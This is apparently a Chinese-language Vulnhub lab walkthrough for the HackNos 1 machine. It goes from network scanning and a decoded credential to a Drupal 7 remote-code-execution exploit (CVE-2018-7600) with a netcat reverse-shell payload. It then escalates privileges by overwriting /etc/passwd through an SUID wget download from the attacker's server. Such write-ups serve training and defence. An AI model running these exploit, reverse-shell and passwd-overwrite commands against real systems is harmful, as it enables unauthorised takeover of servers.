HackNos 1识别目标主机IP地址

(kali㉿kali)-[~/Vulnhub/HackNos1]└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24 Currently scanning: 192.168.56.0/24   |   Screen View: Unique Hosts                                                                                                                                                                                     3 Captured ARP Req/Rep packets, from 3 hosts.   Total size: 180                                                             _____________________________________________________________________________   IP            At MAC Address     Count     Len  MAC Vendor / Hostname       ----------------------------------------------------------------------------- 192.168.56.1    0a:00:27:00:00:06      1      60  Unknown vendor                                                            192.168.56.100  08:00:27:8e:0a:96      1      60  PCS Systemtechnik GmbH                                                    192.168.56.253  08:00:27:19:13:da      1      60  PCS Systemtechnik GmbH        

利用Kali Linux的netdiscover工具识别目标主机IP地址为192.168.56.253

NMAP扫描

──(kali㉿kali)-[~/Vulnhub/HackNos1]└─$ sudo nmap -sS -sV -sC -p- 192.168.56.253 -oN nmap_full_scanStarting Nmap 7.93 ( https://nmap.org ) at 2023-03-24 23:59 EDTNmap scan report for bogon (192.168.56.253)Host is up (0.000098s latency).Not shown: 65533 closed tcp ports (reset)PORT   STATE SERVICE VERSION22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.8 (Ubuntu Linux; protocol 2.0)| ssh-hostkey: |   2048 a5a517704dbe48adba64c107a05503ea (RSA)|   256 f2ce421c04b899539542ab8922669edb (ECDSA)|_  256 4a7d156583af82a31202211c2349fbe9 (ED25519)80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))|_http-title: Apache2 Ubuntu Default Page: It works|_http-server-header: Apache/2.4.18 (Ubuntu)MAC Address: 08:00:27:19:13:DA (Oracle VirtualBox virtual NIC)Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernelService detection performed. Please report any incorrect results at https://nmap.org/submit/ .Nmap done: 1 IP address (1 host up) scanned in 8.67 seconds

NMAP扫描结果表明目标主机有2个开放端口:22(ssh)、80(http)

获得Shell

┌──(kali㉿kali)-[~/Vulnhub/HackNos1]└─$ curl http://192.168.56.253/robots.txt404 Not Found

Not Found

The requested URL was not found on this server.


Apache/2.4.18 (Ubuntu) Server at 192.168.56.253 Port 80
┌──(kali㉿kali)-[~/Vulnhub/HackNos1]└─$ nikto -h http://192.168.56.253- Nikto v2.1.6---------------------------------------------------------------------------+ Target IP: 192.168.56.253+ Target Hostname: 192.168.56.253+ Target Port: 80+ Start Time: 2023-03-25 00:00:46 (GMT-4)---------------------------------------------------------------------------+ Server: Apache/2.4.18 (Ubuntu)+ The anti-clickjacking X-Frame-Options header is not present.+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS+ The X-Content-Type-Options header is not set. This could allow the user agent to render the content of the site in a different fashion to the MIME type+ No CGI Directories found (use '-C all' to force check all possible dirs)+ Server may leak inodes via ETags, header found with file /, inode: 2c39, size: 59633974a1f12, mtime: gzip+ Apache/2.4.18 appears to be outdated (current is at least Apache/2.4.37). Apache 2.2.34 is the EOL for the 2.x branch.+ Allowed HTTP Methods: GET, HEAD, POST, OPTIONS + OSVDB-3233: /icons/README: Apache default file found.+ 7915 requests: 0 error(s) and 7 item(s) reported on remote host+ End Time: 2023-03-25 00:01:36 (GMT-4) (50 seconds)---------------------------------------------------------------------------+ 1 host(s) tested
┌──(kali㉿kali)-[~/Vulnhub/HackNos1]└─$ gobuster dir -u http://192.168.56.253 -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.html,.js,.sh,.txt===============================================================Gobuster v3.3by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)===============================================================[+] Url:                     http://192.168.56.253[+] Method:                  GET[+] Threads:                 10[+] Wordlist:                /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt[+] Negative Status codes:   404[+] User Agent:              gobuster/3.3[+] Extensions:              php,html,js,sh,txt[+] Timeout:                 10s===============================================================2023/03/25 00:02:08 Starting gobuster in directory enumeration mode===============================================================/index.html           (Status: 200) [Size: 11321]/.html                (Status: 403) [Size: 279]/.php                 (Status: 403) [Size: 279]/drupal               (Status: 301) [Size: 317] [--> http://192.168.56.253/drupal/]/alexander.txt        (Status: 200) [Size: 393]/.html                (Status: 403) [Size: 279]/.php                 (Status: 403) [Size: 279]/server-status        (Status: 403) [Size: 279]Progress: 1317761 / 1323366 (99.58%)===============================================================2023/03/25 00:03:14 Finished===============================================================

目录扫描阶段发现了目录:/drupal以及文件:/alexander.txt

┌──(kali㉿kali)-[~/Vulnhub/HackNos1]└─$ curl http://192.168.56.253/alexander.txt | base64 -d  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current                                 Dload  Upload   Total   Spent    Left  Speed100   393  100   393    0     0   387k      0 --:--:-- --:--:-- --:--:--  383k+++++ +++++ [->++ +++++ +++++++ ++.-- ----- --. ++++++.----- ---.++++++ ++.- ----- -- ----- --. +++++++ +.++++ +. ++.++ +++++ +.--- ---.++++++ +.-- ----- -. --- -- -.+.- ---.+++.<         

这是brainfuck编码,用在线网站解码得到:

https://www.splitbrain.org/services/ook
james:Hacker@4514

不知道这是ssh的密码还是drupal的密码,分别尝试一下

──(kali㉿kali)-[~/Vulnhub/HackNos1]└─$ ssh james@192.168.56.253                                        The authenticity of host '192.168.56.253 (192.168.56.253)' can't be established.ED25519 key fingerprint is SHA256:h0yIfMN4Bukv3RMUspEBXwOXzImXvIPPSc2RZjB3cEM.This key is not known by any other names.Are you sure you want to continue connecting (yes/no/[fingerprint])? yesWarning: Permanently added '192.168.56.253' (ED25519) to the list of known hosts.james@192.168.56.253's password: Permission denied, please try again.james@192.168.56.253's password: 

可以成功登录/drupal

http://192.168.56.253/drupal/CHANGELOG.txt

知道drupal版本为7.57

https://github.com/pimps/CVE-2018-7600
┌──(kali㉿kali)-[~/Vulnhub/HackNos1/CVE-2018-7600]└─$ python drupa7-CVE-2018-7600.py http://192.168.56.253/drupal/ -c ls=============================================================================|          DRUPAL 7 <= 7.57 REMOTE CODE EXECUTION (CVE-2018-7600)           ||                              by pimps                                     |=============================================================================[*] Poisoning a form and including it in cache.[*] Poisoned form ID: form-dCNohd49V58rf0ua7aGYvFK5MXbLR1rN2k0EjcA8Hoo[*] Triggering exploit to execute: lsCHANGELOG.txtCOPYRIGHT.txtINSTALL.mysql.txtINSTALL.pgsql.txtINSTALL.sqlite.txtINSTALL.txtLICENSE.txtMAINTAINERS.txtREADME.txtUPGRADE.txtauthorize.phpcron.phpincludesindex.phpinstall.phpmiscmodulesprofilesrobots.txtscriptssitesthemesupdate.phpweb.configxmlrpc.php
──(kali㉿kali)-[~/Vulnhub/HackNos1/CVE-2018-7600]└─$ python drupa7-CVE-2018-7600.py http://192.168.56.253/drupal/ -c 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 192.168.56.206 5555 >/tmp/f'=============================================================================|          DRUPAL 7 &1|nc 192.168.56.206 5555 >/tmp/f
──(kali㉿kali)-[~/Vulnhub/HackNos1]└─$ sudo nc -nlvp 5555                                         [sudo] password for kali: listening on [any] 5555 ...connect to [192.168.56.206] from (UNKNOWN) [192.168.56.253] 33890/bin/sh: 0: can't access tty; job control turned off$ iduid=33(www-data) gid=33(www-data) groups=33(www-data)$ which python$ which python3/usr/bin/python3$ python3 -c 'import pty;pty.spawn("/bin/bash")'www-data@hackNos:/var/www/html/drupal$ 

成功得到了目标主机反弹回来的Shell

www-data@hackNos:/home/james$ ls -alhls -alhtotal 40Kdrwxr-xr-x 3 james james 4.0K Nov 16  2019 .drwxr-xr-x 3 root  root  4.0K Oct 31  2019 ..-rw------- 1 james james 2.6K Nov 16  2019 .bash_history-rw-r--r-- 1 james james  220 Oct 31  2019 .bash_logout-rw-r--r-- 1 james james 3.7K Oct 31  2019 .bashrcdrwx------ 2 james james 4.0K Oct 31  2019 .cache-rw------- 1 root  root   127 Oct 31  2019 .mysql_history-rw-r--r-- 1 james james  655 Oct 31  2019 .profile-rw-r--r-- 1 james james    0 Oct 31  2019 .sudo_as_admin_successful-rw-rw-r-- 1 james james  175 Oct 31  2019 .wget-hsts-rw-r--r-- 1 root  root   357 Nov 16  2019 user.txtwww-data@hackNos:/home/james$ cat user.txtcat user.txt   _                                    | |                                  / __) ______  _   _  ___   ___  _ __  \__ \|______|| | | |/ __| / _ \| '__| (   /        | |_| |\__ \|  __/| |     |_|          \__,_||___/ \___||_|                                                                               MD5-HASH : bae11ce4f67af91fa58576c1da2aad4bwww-data@hackNos:/home/james$ 

提权

由于wget有SUID位,根据GTFOBINS网站的步骤进行提权,但是失败:

www-data@hackNos:/tmp$ TF=$(mktemp)TF=$(mktemp)www-data@hackNos:/tmp$ chmod +x $TFchmod +x $TFwww-data@hackNos:/tmp$ echo -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TFecho -e '#!/bin/sh -p\n/bin/sh -p 1>&0' >$TFwww-data@hackNos:/tmp$ /usr/bin/wget --use-askpass=$TF 0/usr/bin/wget --use-askpass=$TF 0/usr/bin/wget: unrecognized option '--use-askpass=/tmp/tmp.3K0o9eZTI0'Usage: wget [OPTION]... [URL]...Try `wget --help' for more options.

提权的方式就是通过下载目标靶机上的passwd,然后构造一个有root权限的用户加入到构造的passwd文件中,然后使用wget -O将内容重定向输入到/etc/passwd中

┌──(kali㉿kali)-[~/Vulnhub/HackNos1]└─$ openssl passwd -6 -salt jason 123456$6$jason$h5DlgYsVif/enQPTm/CgJ54tpQaPz0fwOmjoJKkTXi.EZ4Z6IOesX4REn/Dq8mXA4povr6tGXPy16EAcN.Ln41                                                                                                

bob用户是我们要添加的具有root权限的用户

www-data@hackNos:/tmp$ wget http://192.168.56.206:8000/passwd -O /etc/passwdwget http://192.168.56.206:8000/passwd -O /etc/passwd--2023-03-25 10:36:39--  http://192.168.56.206:8000/passwdConnecting to 192.168.56.206:8000... connected.HTTP request sent, awaiting response... 200 OKLength: 1746 (1.7K) [application/octet-stream]Saving to: '/etc/passwd'/etc/passwd         100%[===================>]   1.71K  --.-KB/s    in 0s      2023-03-25 10:36:39 (493 MB/s) - '/etc/passwd' saved [1746/1746]www-data@hackNos:/tmp$ 

STRIVE FOR PROGRESS,NOT FOR PERFECTION